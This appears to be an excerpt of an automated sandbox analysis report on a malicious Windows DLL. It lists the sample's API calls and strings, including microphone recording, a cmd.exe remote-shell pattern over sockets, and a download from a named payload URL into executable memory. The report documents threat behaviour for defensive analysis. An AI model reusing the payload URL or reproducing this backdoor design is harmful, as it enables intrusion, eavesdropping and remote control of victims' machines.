                                                          • #800.MFC42(00000000,?,?,00000000,?,00000000,100FB4F0,100FA644), ref: 10011D4F
                                                          • #6282.MFC42(00000000,?,?,00000000,?,00000000,100FB4F0,100FA644), ref: 10011D58
                                                          • #2784.MFC42(100FB4F0,00000000,?,?,00000000,?,00000000,100FB4F0,100FA644), ref: 10011D66
                                                          • #535.MFC42(?,?,100FB4F0,100FA644), ref: 10011D8D
                                                          • #858.MFC42(00000022,?,000000FF,?,?,100FB4F0,100FA644), ref: 10011DC5
                                                          • #858.MFC42(00000022,00000022,?,000000FF,?,?,100FB4F0,100FA644), ref: 10011DD2
                                                          • #800.MFC42(100FB4F0,100FA644), ref: 10011DE8
                                                          • #800.MFC42(100FB4F0,100FA644), ref: 10011DF6
                                                          • #800.MFC42(100FB4F0,100FA644), ref: 10011E07
                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #858$#800$#535$#2614#2784#540#6282$#4129#4278#5710#6283#6662#941
                                                          • String ID: /
                                                          • API String ID: 2746067309-2043925204
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,SetEvent), ref: 10001717
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10001720
                                                          • LoadLibraryA.KERNEL32 ref: 10001792
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10001795
                                                          • LoadLibraryA.KERNEL32(user32.dll,GetMessageA), ref: 100017A5
                                                          • GetProcAddress.KERNEL32(00000000), ref: 100017A8
                                                          • LoadLibraryA.KERNEL32(WINMM.dll,waveInAddBuffer), ref: 100017B6
                                                          • GetProcAddress.KERNEL32(00000000), ref: 100017B9
                                                          • LoadLibraryA.KERNEL32(USER32.dll,TranslateMessage), ref: 100017C9
                                                          • GetProcAddress.KERNEL32(00000000), ref: 100017CC
                                                          • LoadLibraryA.KERNEL32(USER32.dll,DispatchMessageA), ref: 100017DC
                                                          • GetProcAddress.KERNEL32(00000000), ref: 100017DF
                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: DispatchMessageA$F$GetMessageA$KERNEL32.dll$O$S$SetEvent$TranslateMessage$USER32.dll$W$WINMM.dll$a$b$c$g$j$l$n$o$r$user32.dll$waveInAddBuffer
                                                          • API String ID: 2574300362-3155383694
                                                          APIs
                                                            • Part of subcall function 1001B660: GetModuleHandleA.KERNEL32(?,771A83C0,1001F1D6), ref: 1001B666
                                                            • Part of subcall function 1001B660: LoadLibraryA.KERNEL32(?), ref: 1001B671
                                                            • Part of subcall function 1001B660: GetProcAddress.KERNEL32(00000000,?), ref: 1001B681
                                                          • CloseHandle.KERNEL32(00000000), ref: 1001EA4A
                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Handle$AddressCloseLibraryLoadModuleProc
                                                          • String ID: .$2$3$C$F$F$G$K$L$N$P$R$S$W$a$d$i$i$i$i$i$l$l$l$l$l$n$o$r$r$r$t$t$t$t$z
                                                          • API String ID: 1380958172-3142711299
                                                          APIs
                                                          • ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000000,?,?,00000000,?,?,?,?,?,?,00000000,10098C42,000000FF,?,10021131), ref: 10020C4A
                                                          • ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000000,?,?,00000000,?,?,?,?,?,?,00000000,10098C42,000000FF,?,10021131), ref: 10020C5D
                                                          • ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001,?,?,00000000,?,?,?,?,?,?,00000000,10098C42,000000FF,?,10021131), ref: 10020C7A
                                                          • ?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z.MSVCP60(?,?,00000001,?,00000000,?,?,?,?,?,?,00000000,10098C42,000000FF), ref: 10020CA0
                                                          • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP60(1011FA3C,00000000,?,?,00000001,?,00000000,?,?,?,?,?,?,00000000,10098C42,000000FF), ref: 10020CDD
                                                          • CreateFileA.KERNEL32(C:\Users\Public\Documents\MM\4.txt,80000000,00000001,00000000,00000003,00000080,00000000,?,?,00000001,?,00000000), ref: 10020D06
                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,00000001,?,00000000,?,?,?,?,?,?,00000000,10098C42,000000FF), ref: 10020D1A
                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040,?,?,00000001,?,00000000,?,?,?,?,?,?,00000000), ref: 10020D35
                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,00000001,?,00000000), ref: 10020D51
                                                          • CloseHandle.KERNEL32(00000000,?,?,00000001,?,00000000,?,?,?,?,?,?,00000000,10098C42,000000FF), ref: 10020D69
                                                          • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000001,?,00000000,?,?,?,?,?,?,00000000,10098C42), ref: 10020D81
                                                          • Sleep.KERNEL32(000007D0,?,00000000,?,?,?,?,?,?,00000000,10098C42,000000FF), ref: 10020D8E
                                                          • #825.MFC42(?,?,?,00000001,?,00000000,?,?,?,?,?,?,00000000,10098C42,000000FF), ref: 10020DB0
                                                          • #825.MFC42(?,?,?,00000001,?,00000000,?,?,?,?,?,?,00000000,10098C42,000000FF), ref: 10020DE3
                                                          • MessageBoxA.USER32(00000000,1011FA00,1011FA10,00000000), ref: 10020E05
                                                          • ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001,?,?,00000001,?,00000000,?,?,?,?,?,?,00000000,10098C42,000000FF), ref: 10020E14
                                                          • ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001,?,?,00000001,?,00000000,?,?,?,?,?,?,00000000,10098C42,000000FF), ref: 10020E26
                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$Tidy@?$basic_string@$File$#825Virtual$?find@?$basic_string@AllocCloseCreateEos@?$basic_string@FreeGrow@?$basic_string@HandleMessageReadSizeSleep
                                                          • String ID: C:\Users\Public\Documents\MM\4.txt$schtasks /Query /TN MM
                                                          • API String ID: 954268177-2491561334
                                                          • Opcode ID: 5a969736a3d137a320b0cc1ca8b356557b55b2379ab61979d884f25b2f463f53
                                                          • Instruction ID: 372624cc682f9d1b02af3a29d4a48bc895267d3934594f3d044cf31d86844c04
                                                          • Opcode Fuzzy Hash: 5a969736a3d137a320b0cc1ca8b356557b55b2379ab61979d884f25b2f463f53
                                                          • Instruction Fuzzy Hash: 6E910235A41358ABEB14CBA4DC88BEEBFB5EF19710F580258F80A772C2C7751A41CB65
                                                          APIs
                                                            • Part of subcall function 100109B0: LoadLibraryA.KERNEL32(KERNEL32.dll,CreateEventA,?,?,1000F32E,?,?,00000000,1001DC8E,?,100FA3E4,?), ref: 100109D0
                                                            • Part of subcall function 100109B0: GetProcAddress.KERNEL32(00000000), ref: 100109D7
                                                          • LoadLibraryA.KERNEL32 ref: 1002176D
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10021776
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,GetSystemDirectoryA), ref: 10021786
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10021789
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,CreatePipe), ref: 10021799
                                                          • GetProcAddress.KERNEL32(00000000), ref: 1002179C
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,GetStartupInfoA), ref: 100217AC
                                                          • GetProcAddress.KERNEL32(00000000), ref: 100217AF
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,CreateProcessA), ref: 100217BF
                                                          • GetProcAddress.KERNEL32(00000000), ref: 100217C2
                                                          • WaitForInputIdle.USER32(?,000000FF), ref: 10021998
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc$IdleInputWait
                                                          • String ID: C$CreatePipe$CreateProcessA$D$GetStartupInfoA$GetSystemDirectoryA$H$KERNEL32.dll$\cmd.exe$a$dnaH$n$o$s$x32$x64
                                                          • API String ID: 2019908028-49846795
                                                          • Opcode ID: a11154c452e8f8ca2bbd37bacc63169b39e844789c8680e5a122f9f1d25584d2
                                                          • Instruction ID: d2156f82375759501e581fc1ef989f192f098b0fc37ec42ae3431b591a90c868
                                                          • Opcode Fuzzy Hash: a11154c452e8f8ca2bbd37bacc63169b39e844789c8680e5a122f9f1d25584d2
                                                          • Instruction Fuzzy Hash: 8BC1AE75608384AFC724CF24C880B9BBBE5EFD9710F50492DF58997280DB749945CB96
                                                          APIs
                                                          • CoInitialize.OLE32 ref: 1002AED3
                                                          • CoCreateInstance.OLE32(100B7A14,00000000,00000001,100B7A34,?), ref: 1002AEEC
                                                          • LocalAlloc.KERNEL32(00000040,00002710), ref: 1002AEFB
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 1002AF92
                                                          • #823.MFC42(00000000), ref: 1002AFA5
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 1002AFC0
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 1002AFDD
                                                          • #823.MFC42(00000000), ref: 1002AFED
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 1002B008
                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 1002B016
                                                          • wsprintfA.USER32 ref: 1002B066
                                                          • lstrlenA.KERNEL32(00000000), ref: 1002B070
                                                          • lstrlenA.KERNEL32(?), ref: 1002B079
                                                          • lstrlenA.KERNEL32(?), ref: 1002B082
                                                          • LocalSize.KERNEL32(?), ref: 1002B094
                                                          • LocalReAlloc.KERNEL32(?,00000000,00000042), ref: 1002B0A2
                                                          • lstrlenA.KERNEL32(?), ref: 1002B0B1
                                                          • lstrlenA.KERNEL32(?), ref: 1002B0D8
                                                          • lstrlenA.KERNEL32(00000000), ref: 1002B0E7
                                                          • lstrlenA.KERNEL32(00000000), ref: 1002B103
                                                          • lstrlenA.KERNEL32(?), ref: 1002B116
                                                          • lstrlenA.KERNEL32(?), ref: 1002B134
                                                          • #825.MFC42(00000000), ref: 1002B17B
                                                          • #825.MFC42(?), ref: 1002B1C0
                                                          • CoUninitialize.OLE32 ref: 1002B1F5
                                                          • LocalReAlloc.KERNEL32(00000000,00000001,00000042), ref: 1002B203
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrlen$ByteCharLocalMultiWide$Alloc$#823#825Time$CreateFileInitializeInstanceSizeSystemUninitializewsprintf
                                                          • String ID: %d-%d-%d %d:%d:%d
                                                          • API String ID: 1491319390-2068262593
                                                          • Opcode ID: 1b83c80fe2a63424a2d4bff5dae57cfa6ee10cf1f52e7d96517ebe19a1b71b17
                                                          • Instruction ID: af968043ba8b2913ef9a19756fa2208ce54cb015f96bc4872ac0b3bef0e4c24a
                                                          • Opcode Fuzzy Hash: 1b83c80fe2a63424a2d4bff5dae57cfa6ee10cf1f52e7d96517ebe19a1b71b17
                                                          • Instruction Fuzzy Hash: 38A1AF75208302AFD310CF24DC91B6BB7E9EF89710F944A28F995A7391DA75E8098792
                                                          APIs
                                                          • EnterCriticalSection.KERNEL32(1012C4E8), ref: 1002371C
                                                          • LeaveCriticalSection.KERNEL32(1012C4E8), ref: 10023734
                                                          • malloc.MSVCRT ref: 1002374D
                                                          • malloc.MSVCRT ref: 10023756
                                                          • malloc.MSVCRT ref: 1002375F
                                                          • recv.WS2_32 ref: 100237C6
                                                          • send.WS2_32 ref: 10023846
                                                          • getpeername.WS2_32(?,?,?), ref: 1002387B
                                                          • inet_addr.WS2_32(00000000), ref: 10023888
                                                          • inet_addr.WS2_32(00000000), ref: 100238A2
                                                          • htons.WS2_32(?), ref: 100238AD
                                                          • send.WS2_32 ref: 100238EF
                                                          • CreateThread.KERNEL32(00000000,00000000,10023D00,?,00000000,?), ref: 1002392E
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1002393F
                                                            • Part of subcall function 100234D0: htons.WS2_32 ref: 100234F3
                                                            • Part of subcall function 100234D0: inet_addr.WS2_32(?), ref: 10023509
                                                            • Part of subcall function 100234D0: inet_addr.WS2_32(?), ref: 10023527
                                                            • Part of subcall function 100234D0: socket.WS2_32(00000002,00000001,00000006), ref: 10023533
                                                            • Part of subcall function 100234D0: setsockopt.WS2_32 ref: 1002355E
                                                            • Part of subcall function 100234D0: connect.WS2_32(?,?,00000010), ref: 1002356E
                                                            • Part of subcall function 100234D0: closesocket.WS2_32 ref: 1002357C
                                                          • send.WS2_32(?,?,00000008,00000000), ref: 10023990
                                                          • CreateThread.KERNEL32(00000000,00000000,10023F60,?,00000000,?), ref: 100239BD
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,00000008,00000000), ref: 100239CA
                                                            • Part of subcall function 100232C0: gethostbyname.WS2_32(?), ref: 100232C5
                                                          • closesocket.WS2_32(00000000), ref: 100239D9
                                                          • closesocket.WS2_32(?), ref: 100239DF
                                                          • free.MSVCRT ref: 100239E8
                                                          • free.MSVCRT ref: 100239EB
                                                          • free.MSVCRT ref: 100239F2
                                                          • free.MSVCRT ref: 100239F5
                                                            • Part of subcall function 10022E40: EnterCriticalSection.KERNEL32(1012C4E8), ref: 10022E6A
                                                            • Part of subcall function 10022E40: LeaveCriticalSection.KERNEL32(1012C4E8), ref: 10022E82
                                                            • Part of subcall function 10022E40: send.WS2_32(?,HTTP/1.0 200 OK,?,00000000), ref: 10022F1E
                                                            • Part of subcall function 10022E40: CreateThread.KERNEL32(00000000,00000000,10023F60,?,00000000,?), ref: 10022FBC
                                                            • Part of subcall function 10022E40: WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000,00000000), ref: 10022FC9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalSectionfreeinet_addrsend$CreateObjectSingleThreadWaitclosesocketmalloc$EnterLeavehtons$connectgethostbynamegetpeernamerecvsetsockoptsocket
                                                          • String ID: [
                                                          • API String ID: 3942976521-784033777
                                                          • Opcode ID: 3a2268755cef6764fc649d5fa3a3f983a899e33ae9e3db57bf8fbebbe5547fd3
                                                          • Instruction ID: e9549ad0dd3f4253299fe20122cfa47d020b0e4884b45b3b790ec5c0bf8e8527
                                                          • Opcode Fuzzy Hash: 3a2268755cef6764fc649d5fa3a3f983a899e33ae9e3db57bf8fbebbe5547fd3
                                                          • Instruction Fuzzy Hash: 7981F270608344AFE310DB68DC85B5BBBE8EFC5754F548A1EF58983390E7B1E8448B62
                                                          APIs
                                                          • InternetOpenA.WININET(DownloadApp,00000001,00000000,00000000,00000000), ref: 1002082B
                                                          • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(6D49A3D8,1011F9A8,?,?,1002128D,?,00000001,?,?,00000001), ref: 10020846
                                                          • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,80000000,00000000), ref: 10020871
                                                          • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(6D49A3D8,1011F998,?,?,?,1002128D,?,00000001,?,?,00000001), ref: 1002088A
                                                          • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(00000000,?,00000001), ref: 10020894
                                                          • ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z.MSVCP60(00000000,00000000,?,00000001), ref: 1002089A
                                                          • InternetCloseHandle.WININET(00000000), ref: 100208A4
                                                          • ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z.MSVCP60(00000000,00000000,?,00000001), ref: 100209B0
                                                          Strings
                                                          • https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1723729291433/7.txt, xrefs: 1002081D
                                                          • DownloadApp, xrefs: 10020826
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: U?$char_traits@$V?$basic_ostream@$??6std@@D@std@@@0@InternetV10@$?endl@std@@D@std@@@1@OpenV21@@$CloseD@2@@0@@D@std@@HandleV?$allocator@V?$basic_string@
                                                          • String ID: DownloadApp$https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1723729291433/7.txt
                                                          • API String ID: 2470020359-224967001
                                                          • Opcode ID: 32d36391f2d7d4904f82a27f97c872808f4ad89287abde04870944640ee7d5a7
                                                          • Instruction ID: 56cbb8ff2905a2750e3cd2c2d1ffd8e82e618ae840f826ece4bff099c8b17c2b
                                                          • Opcode Fuzzy Hash: 32d36391f2d7d4904f82a27f97c872808f4ad89287abde04870944640ee7d5a7
                                                          • Instruction Fuzzy Hash: E741E439600315BBF210EB74DC85FEB37ECFB48B51F080619FE48E6191D674A9048B65
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,ResumeThread,00000000,?,00000000,771AF550), ref: 100015B9
                                                          • GetProcAddress.KERNEL32(00000000), ref: 100015C2
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,CreateThread,?,00000000,771AF550), ref: 100015D2
                                                          • GetProcAddress.KERNEL32(00000000), ref: 100015D5
                                                          • LoadLibraryA.KERNEL32(WINMM.dll,waveInOpen,?,00000000,771AF550), ref: 100015E5
                                                          • GetProcAddress.KERNEL32(00000000), ref: 100015E8
                                                          • LoadLibraryA.KERNEL32(WINMM.dll,waveInGetNumDevs,?,00000000,771AF550), ref: 100015F8
                                                          • GetProcAddress.KERNEL32(00000000), ref: 100015FB
                                                          • LoadLibraryA.KERNEL32(WINMM.dll,waveInPrepareHeader,?,00000000,771AF550), ref: 10001609
                                                          • GetProcAddress.KERNEL32(00000000), ref: 1000160C
                                                          • LoadLibraryA.KERNEL32(WINMM.dll,waveInAddBuffer,?,00000000,771AF550), ref: 1000161C
                                                          • GetProcAddress.KERNEL32(00000000), ref: 1000161F
                                                          • LoadLibraryA.KERNEL32(WINMM.dll,waveInStart,?,00000000,771AF550), ref: 1000162F
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10001632
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: CreateThread$KERNEL32.dll$ResumeThread$WINMM.dll$waveInAddBuffer$waveInGetNumDevs$waveInOpen$waveInPrepareHeader$waveInStart
                                                          • API String ID: 2574300362-1356117283
                                                          • Opcode ID: b16c15dad6be20392214e3733c7d2997f9670e9390d019f32002513cfd113147
                                                          • Instruction ID: 9f0f930b95cd2c35929b0060be92cf7d2e31dda6e2d7e4543e4cf746f9a0d286
                                                          • Opcode Fuzzy Hash: b16c15dad6be20392214e3733c7d2997f9670e9390d019f32002513cfd113147
                                                          • Instruction Fuzzy Hash: 97414CB5900308ABDB10EFA5DC88E9BBBA8EF89350F15095AFA4497201D739E545CBA1
                                                          APIs
                                                          • GlobalAlloc.KERNEL32(00000040,00000100), ref: 1000206D
                                                          • GlobalLock.KERNEL32(00000000), ref: 1000208C
                                                          • GlobalFree.KERNEL32(00000000), ref: 10002099
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Global$AllocFreeLock
                                                          • String ID:
                                                          • API String ID: 1811133220-0
                                                          • Opcode ID: ad7f2aed513f67e62ba89c4c6e811acdb24dde1641cf500df862e188d5b8eadf
                                                          • Instruction ID: 0a32fddf0529b7f81130ae60a00d4a3e16a3ce89216675909d7529b56b8ea342
                                                          • Opcode Fuzzy Hash: ad7f2aed513f67e62ba89c4c6e811acdb24dde1641cf500df862e188d5b8eadf
                                                          • Instruction Fuzzy Hash: 1671C276610301ABD310CF54CC89F9AB3B4FF54714F569608E608AF2B1E3B8E549C76A
                                                          APIs
                                                          • _access.MSVCRT ref: 100211E6
                                                          • ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001), ref: 1002121E
                                                          • ?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z.MSVCP60(?,?,00000001), ref: 10021244
                                                          • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1723729291433/7.txt,?,?,00000001), ref: 10021276
                                                          • #825.MFC42(?,?,00000001), ref: 100212AC
                                                          • #825.MFC42(?,?,00000001), ref: 100212D9
                                                          • Sleep.KERNEL32(000000C8), ref: 100212E6
                                                          • CreateFileA.KERNEL32(C:\Users\Public\Documents\MM\7.txt,80000000,00000001,00000000,00000003,00000080,00000000), ref: 10021301
                                                          • MessageBoxA.USER32(00000000,1011FA00,1011FA10,00000000), ref: 1002131C
                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 10021328
                                                          • MessageBoxA.USER32(00000000,1011F9EC,1011FA10,00000000), ref: 10021343
                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040), ref: 10021358
                                                          • MessageBoxA.USER32(00000000,1011F9DC,1011FA10,00000000), ref: 10021375
                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 10021384
                                                          • CloseHandle.KERNEL32(00000000), ref: 10021394
                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 100213AC
                                                          • CloseHandle.KERNEL32(00000000), ref: 100213EA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
